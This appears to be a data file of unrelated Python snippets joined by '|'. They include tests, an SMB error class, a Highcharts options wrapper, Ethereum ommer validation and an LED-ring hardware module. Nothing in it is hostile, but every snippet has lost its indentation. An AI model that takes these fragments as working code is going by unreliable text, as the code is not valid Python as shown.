(odd_ratio, even_ratio, companion_position) = args
windows = self.workspaces.windows()
geoms = [self._get_window_geometry(window) for window in windows]
for (i, geom) in enumerate(geoms[0::2]):
if (((len(geoms) % 2) == 0) or (((i * 2) + 1) < len(geoms))):
companion_geom = geoms[((i * 2) + 1)]
assert (geom.x == companion_geom.x)
is_up = (1 if ((companion_position == 'up') or ((companion_position == 'alt-up') and ((i % 2) == 0)) or ((companion_position == 'alt-down') and ((i % 2) == 1))) else (- 1))
assert (geom.y > (is_up * (companion_geom.y + companion_geom.height)))
ratio = (odd_ratio if ((i % 2) == 0) else even_ratio)
assert (geom.height == approx(((1 - ratio) * (companion_geom.height + geom.height)), abs=2))
else:
assert (geom.height == approx(800, abs=2))
if (i > 0):
assert (geom.x > geoms[((i - 1) * 2)].x) |
def test_run_component_modeler_mappings(monkeypatch, tmp_path):
element_mappings = (((('left_bot', 0), ('right_bot', 0)), (('left_top', 0), ('right_top', 0)), (- 1j)), ((('left_bot', 0), ('right_top', 0)), (('left_top', 0), ('right_bot', 0)), (+ 1)))
modeler = make_component_modeler(element_mappings=element_mappings, path_dir=str(tmp_path))
s_matrix = run_component_modeler(monkeypatch, modeler)
_test_mappings(element_mappings, s_matrix) |
class SessionError(Exception):
def __init__(self, error=0, packet=0):
Exception.__init__(self)
self.error = error
self.packet = packet
def getErrorCode(self):
return self.error
def getErrorPacket(self):
return self.packet
def getErrorString(self):
return str(self)
def __str__(self):
key = self.error
if (key in nt_errors.ERROR_MESSAGES):
error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
return ('SMB SessionError: code: 0x%x - %s - %s' % (self.error, error_msg_short, error_msg_verbose))
else:
return ('SMB SessionError: unknown error code: 0x%x' % self.error) |
class TestTraitEventNotifierAddRemove(unittest.TestCase):
def setUp(self):
push_exception_handler(reraise_exceptions=True)
self.addCleanup(pop_exception_handler)
def tearDown(self):
pass
def test_add_to_observable(self):
dummy = DummyObservable()
dummy.notifiers = [str, float]
notifier = create_notifier()
notifier.add_to(dummy)
self.assertEqual(dummy.notifiers, [str, float, notifier])
def test_add_to_observable_twice_increase_count(self):
dummy = DummyObservable()
def handler(event):
pass
notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
notifier2 = create_notifier(handler=handler, target=_DUMMY_TARGET)
notifier1.add_to(dummy)
notifier2.add_to(dummy)
self.assertEqual(dummy.notifiers, [notifier1])
self.assertEqual(notifier1._ref_count, 2)
def test_add_to_observable_different_notifier(self):
dummy = DummyObservable()
def handler(event):
pass
notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
notifier2 = create_notifier(handler=handler, target=dummy)
notifier1.add_to(dummy)
notifier2.add_to(dummy)
self.assertEqual(dummy.notifiers, [notifier1, notifier2])
def test_remove_from_observable(self):
dummy = DummyObservable()
def handler(event):
pass
notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
notifier2 = create_notifier(handler=handler, target=_DUMMY_TARGET)
notifier1.add_to(dummy)
self.assertEqual(dummy.notifiers, [notifier1])
notifier2.remove_from(dummy)
self.assertEqual(dummy.notifiers, [])
def test_remove_from_observable_with_ref_count(self):
dummy = DummyObservable()
def handler(event):
pass
notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
notifier2 = create_notifier(handler=handler, target=_DUMMY_TARGET)
notifier1.add_to(dummy)
notifier1.add_to(dummy)
self.assertEqual(dummy.notifiers, [notifier1])
notifier2.remove_from(dummy)
self.assertEqual(dummy.notifiers, [notifier1])
notifier2.remove_from(dummy)
self.assertEqual(dummy.notifiers, [])
def test_remove_from_error_if_not_found(self):
dummy = DummyObservable()
notifier1 = create_notifier()
with self.assertRaises(NotifierNotFound) as e:
notifier1.remove_from(dummy)
self.assertEqual(str(e.exception), 'Notifier not found.')
def test_remove_from_differentiate_not_equal_notifier(self):
dummy = DummyObservable()
notifier1 = create_notifier(handler=mock.Mock())
notifier2 = create_notifier(handler=mock.Mock())
notifier1.add_to(dummy)
notifier2.add_to(dummy)
notifier2.remove_from(dummy)
self.assertEqual(dummy.notifiers, [notifier1])
def test_add_to_multiple_observables(self):
dummy1 = DummyObservable()
dummy2 = DummyObservable()
notifier = create_notifier()
notifier.add_to(dummy1)
with self.assertRaises(RuntimeError) as exception_context:
notifier.add_to(dummy2)
self.assertEqual(str(exception_context.exception), 'Sharing notifiers across observables is unexpected.') |
class RingControl(Module):
def __init__(self, pad, mode, color, nleds, sys_clk_freq):
ring = RingSerialCtrl(nleds, sys_clk_freq)
self.submodules += ring
ring_timer = WaitTimer(int((0.05 * sys_clk_freq)))
self.submodules += ring_timer
index = Signal(12, reset=1)
if (mode == mode.DOUBLE):
print('Led ring controller configured for dual led')
led_array = Array([2080, 1040, 520, 260, 130, 65, 2080, 1040, 520, 260, 130, 65])
else:
print('Led ring controller configured for single led')
led_array = Array([2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1])
self.comb += ring_timer.wait.eq((~ ring_timer.done))
self.sync += [If(ring_timer.done, index.eq((index + 1)), If((index == 11), index.eq(0)))]
self.comb += ring.leds.eq(led_array[index])
self.comb += [ring.colors.eq(color), pad.eq(ring.do)] |
class OptionSeriesVariablepie(Options):
def accessibility(self) -> 'OptionSeriesVariablepieAccessibility':
return self._config_sub_data('accessibility', OptionSeriesVariablepieAccessibility)
def allowPointSelect(self):
return self._config_get(False)
def allowPointSelect(self, flag: bool):
self._config(flag, js_type=False)
def animation(self):
return self._config_get(True)
def animation(self, flag: bool):
self._config(flag, js_type=False)
def animationLimit(self):
return self._config_get(None)
def animationLimit(self, num: float):
self._config(num, js_type=False)
def borderColor(self):
return self._config_get('#ffffff')
def borderColor(self, text: str):
self._config(text, js_type=False)
def borderRadius(self):
return self._config_get(3)
def borderRadius(self, num: float):
self._config(num, js_type=False)
def borderWidth(self):
return self._config_get(1)
def borderWidth(self, num: float):
self._config(num, js_type=False)
def center(self):
return self._config_get([null, null])
def center(self, value: Any):
self._config(value, js_type=False)
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def clip(self):
return self._config_get(False)
def clip(self, flag: bool):
self._config(flag, js_type=False)
def color(self):
return self._config_get('#cccccc')
def color(self, text: str):
self._config(text, js_type=False)
def colorAxis(self):
return self._config_get(0)
def colorAxis(self, num: float):
self._config(num, js_type=False)
def colorIndex(self):
return self._config_get(None)
def colorIndex(self, num: float):
self._config(num, js_type=False)
def colorKey(self):
return self._config_get('y')
def colorKey(self, text: str):
self._config(text, js_type=False)
def colors(self):
return self._config_get(None)
def colors(self, value: Any):
self._config(value, js_type=False)
def connectEnds(self):
return self._config_get(None)
def connectEnds(self, flag: bool):
self._config(flag, js_type=False)
def connectNulls(self):
return self._config_get(False)
def connectNulls(self, flag: bool):
self._config(flag, js_type=False)
def crisp(self):
return self._config_get(True)
def crisp(self, flag: bool):
self._config(flag, js_type=False)
def cropThreshold(self):
return self._config_get(300)
def cropThreshold(self, num: float):
self._config(num, js_type=False)
def cursor(self):
return self._config_get(None)
def cursor(self, text: str):
self._config(text, js_type=False)
def custom(self):
return self._config_get(None)
def custom(self, value: Any):
self._config(value, js_type=False)
def dashStyle(self):
return self._config_get('Solid')
def dashStyle(self, text: str):
self._config(text, js_type=False)
def data(self) -> 'OptionSeriesVariablepieData':
return self._config_sub_data('data', OptionSeriesVariablepieData)
def dataLabels(self) -> 'OptionSeriesVariablepieDatalabels':
return self._config_sub_data('dataLabels', OptionSeriesVariablepieDatalabels)
def depth(self):
return self._config_get(0)
def depth(self, num: float):
self._config(num, js_type=False)
def description(self):
return self._config_get(None)
def description(self, text: str):
self._config(text, js_type=False)
def dragDrop(self) -> 'OptionSeriesVariablepieDragdrop':
return self._config_sub_data('dragDrop', OptionSeriesVariablepieDragdrop)
def enableMouseTracking(self):
return self._config_get(True)
def enableMouseTracking(self, flag: bool):
self._config(flag, js_type=False)
def endAngle(self):
return self._config_get(None)
def endAngle(self, num: float):
self._config(num, js_type=False)
def events(self) -> 'OptionSeriesVariablepieEvents':
return self._config_sub_data('events', OptionSeriesVariablepieEvents)
def fillColor(self):
return self._config_get('undefined')
def fillColor(self, text: str):
self._config(text, js_type=False)
def findNearestPointBy(self):
return self._config_get('x')
def findNearestPointBy(self, text: str):
self._config(text, js_type=False)
def getExtremesFromAll(self):
return self._config_get(False)
def getExtremesFromAll(self, flag: bool):
self._config(flag, js_type=False)
def id(self):
return self._config_get(None)
def id(self, text: str):
self._config(text, js_type=False)
def ignoreHiddenPoint(self):
return self._config_get(True)
def ignoreHiddenPoint(self, flag: bool):
self._config(flag, js_type=False)
def inactiveOtherPoints(self):
return self._config_get(True)
def inactiveOtherPoints(self, flag: bool):
self._config(flag, js_type=False)
def includeInDataExport(self):
return self._config_get(None)
def includeInDataExport(self, flag: bool):
self._config(flag, js_type=False)
def index(self):
return self._config_get(None)
def index(self, num: float):
self._config(num, js_type=False)
def innerSize(self):
return self._config_get(0)
def innerSize(self, num: float):
self._config(num, js_type=False)
def keys(self):
return self._config_get(None)
def keys(self, value: Any):
self._config(value, js_type=False)
def label(self) -> 'OptionSeriesVariablepieLabel':
return self._config_sub_data('label', OptionSeriesVariablepieLabel)
def legendIndex(self):
return self._config_get(None)
def legendIndex(self, num: float):
self._config(num, js_type=False)
def legendSymbol(self):
return self._config_get('rectangle')
def legendSymbol(self, text: str):
self._config(text, js_type=False)
def linecap(self):
return self._config_get(round)
def linecap(self, value: Any):
self._config(value, js_type=False)
def lineWidth(self):
return self._config_get(2)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def linkedTo(self):
return self._config_get(None)
def linkedTo(self, text: str):
self._config(text, js_type=False)
def marker(self) -> 'OptionSeriesVariablepieMarker':
return self._config_sub_data('marker', OptionSeriesVariablepieMarker)
def maxPointSize(self):
return self._config_get('100%')
def maxPointSize(self, num: float):
self._config(num, js_type=False)
def minPointSize(self):
return self._config_get('10%')
def minPointSize(self, num: float):
self._config(num, js_type=False)
def minSize(self):
return self._config_get(80)
def minSize(self, num: float):
self._config(num, js_type=False)
def name(self):
return self._config_get(None)
def name(self, text: str):
self._config(text, js_type=False)
def negativeColor(self):
return self._config_get(None)
def negativeColor(self, text: str):
self._config(text, js_type=False)
def onPoint(self) -> 'OptionSeriesVariablepieOnpoint':
return self._config_sub_data('onPoint', OptionSeriesVariablepieOnpoint)
def opacity(self):
return self._config_get(1)
def opacity(self, num: float):
self._config(num, js_type=False)
def point(self) -> 'OptionSeriesVariablepiePoint':
return self._config_sub_data('point', OptionSeriesVariablepiePoint)
def pointDescriptionFormat(self):
return self._config_get(None)
def pointDescriptionFormat(self, value: Any):
self._config(value, js_type=False)
def pointDescriptionFormatter(self):
return self._config_get(None)
def pointDescriptionFormatter(self, value: Any):
self._config(value, js_type=False)
def pointInterval(self):
return self._config_get(1)
def pointInterval(self, num: float):
self._config(num, js_type=False)
def pointIntervalUnit(self):
return self._config_get(None)
def pointIntervalUnit(self, value: Any):
self._config(value, js_type=False)
def pointPlacement(self):
return self._config_get(None)
def pointPlacement(self, text: str):
self._config(text, js_type=False)
def pointStart(self):
return self._config_get(0)
def pointStart(self, num: float):
self._config(num, js_type=False)
def relativeXValue(self):
return self._config_get(False)
def relativeXValue(self, flag: bool):
self._config(flag, js_type=False)
def selected(self):
return self._config_get(False)
def selected(self, flag: bool):
self._config(flag, js_type=False)
def shadow(self):
return self._config_get(False)
def shadow(self, flag: bool):
self._config(flag, js_type=False)
def showCheckbox(self):
return self._config_get(False)
def showCheckbox(self, flag: bool):
self._config(flag, js_type=False)
def showInLegend(self):
return self._config_get(False)
def showInLegend(self, flag: bool):
self._config(flag, js_type=False)
def size(self):
return self._config_get(None)
def size(self, num: float):
self._config(num, js_type=False)
def sizeBy(self):
return self._config_get(area)
def sizeBy(self, value: Any):
self._config(value, js_type=False)
def skipKeyboardNavigation(self):
return self._config_get(None)
def skipKeyboardNavigation(self, flag: bool):
self._config(flag, js_type=False)
def slicedOffset(self):
return self._config_get(10)
def slicedOffset(self, num: float):
self._config(num, js_type=False)
def softThreshold(self):
return self._config_get(True)
def softThreshold(self, flag: bool):
self._config(flag, js_type=False)
def sonification(self) -> 'OptionSeriesVariablepieSonification':
return self._config_sub_data('sonification', OptionSeriesVariablepieSonification)
def stacking(self):
return self._config_get(None)
def stacking(self, text: str):
self._config(text, js_type=False)
def startAngle(self):
return self._config_get(0)
def startAngle(self, num: float):
self._config(num, js_type=False)
def states(self) -> 'OptionSeriesVariablepieStates':
return self._config_sub_data('states', OptionSeriesVariablepieStates)
def step(self):
return self._config_get(None)
def step(self, value: Any):
self._config(value, js_type=False)
def stickyTracking(self):
return self._config_get(False)
def stickyTracking(self, flag: bool):
self._config(flag, js_type=False)
def thickness(self):
return self._config_get('undefined')
def thickness(self, num: float):
self._config(num, js_type=False)
def threshold(self):
return self._config_get(0)
def threshold(self, num: float):
self._config(num, js_type=False)
def tooltip(self) -> 'OptionSeriesVariablepieTooltip':
return self._config_sub_data('tooltip', OptionSeriesVariablepieTooltip)
def turboThreshold(self):
return self._config_get(1000)
def turboThreshold(self, num: float):
self._config(num, js_type=False)
def type(self):
return self._config_get(None)
def type(self, text: str):
self._config(text, js_type=False)
def visible(self):
return self._config_get(True)
def visible(self, flag: bool):
self._config(flag, js_type=False)
def zIndex(self):
return self._config_get(None)
def zIndex(self, num: float):
self._config(num, js_type=False)
def zMax(self):
return self._config_get('undefined')
def zMax(self, num: float):
self._config(num, js_type=False)
def zMin(self):
return self._config_get('undefined')
def zMin(self, num: float):
self._config(num, js_type=False)
def zoneAxis(self):
return self._config_get('y')
def zoneAxis(self, text: str):
self._config(text, js_type=False)
def zones(self) -> 'OptionSeriesVariablepieZones':
return self._config_sub_data('zones', OptionSeriesVariablepieZones) |
def validate_ommers(ommers: Tuple[(Header, ...)], block_header: Header, chain: BlockChain) -> None:
block_hash = rlp.rlp_hash(block_header)
ensure((rlp.rlp_hash(ommers) == block_header.ommers_hash), InvalidBlock)
if (len(ommers) == 0):
return
for ommer in ommers:
ensure((1 <= ommer.number < block_header.number), InvalidBlock)
ommer_parent_header = chain.blocks[((- (block_header.number - ommer.number)) - 1)].header
validate_header(ommer, ommer_parent_header)
ensure((len(ommers) <= 2), InvalidBlock)
ommers_hashes = [rlp.rlp_hash(ommer) for ommer in ommers]
ensure((len(ommers_hashes) == len(set(ommers_hashes))), InvalidBlock)
recent_canonical_blocks = chain.blocks[(- (MAX_OMMER_DEPTH + 1)):]
recent_canonical_block_hashes = {rlp.rlp_hash(block.header) for block in recent_canonical_blocks}
recent_ommers_hashes: Set[Hash32] = set()
for block in recent_canonical_blocks:
recent_ommers_hashes = recent_ommers_hashes.union({rlp.rlp_hash(ommer) for ommer in block.ommers})
for (ommer_index, ommer) in enumerate(ommers):
ommer_hash = ommers_hashes[ommer_index]
ensure((ommer_hash != block_hash), InvalidBlock)
ensure((ommer_hash not in recent_canonical_block_hashes), InvalidBlock)
ensure((ommer_hash not in recent_ommers_hashes), InvalidBlock)
ommer_age = (block_header.number - ommer.number)
ensure((1 <= ommer_age <= MAX_OMMER_DEPTH), InvalidBlock)
ensure((ommer.parent_hash in recent_canonical_block_hashes), InvalidBlock)
ensure((ommer.parent_hash != block_header.parent_hash), InvalidBlock) |
def extractCheldraWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class Python(Generator, Jinja2):
def __init__(self, rmap=None, path='regs.py', **args):
super().__init__(rmap, **args)
self.path = path
def generate(self):
self.validate()
j2_template = 'regmap_py.j2'
j2_vars = {}
j2_vars['corsair_ver'] = __version__
j2_vars['rmap'] = self.rmap
j2_vars['config'] = config.globcfg
self.render_to_file(j2_template, j2_vars, self.path) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.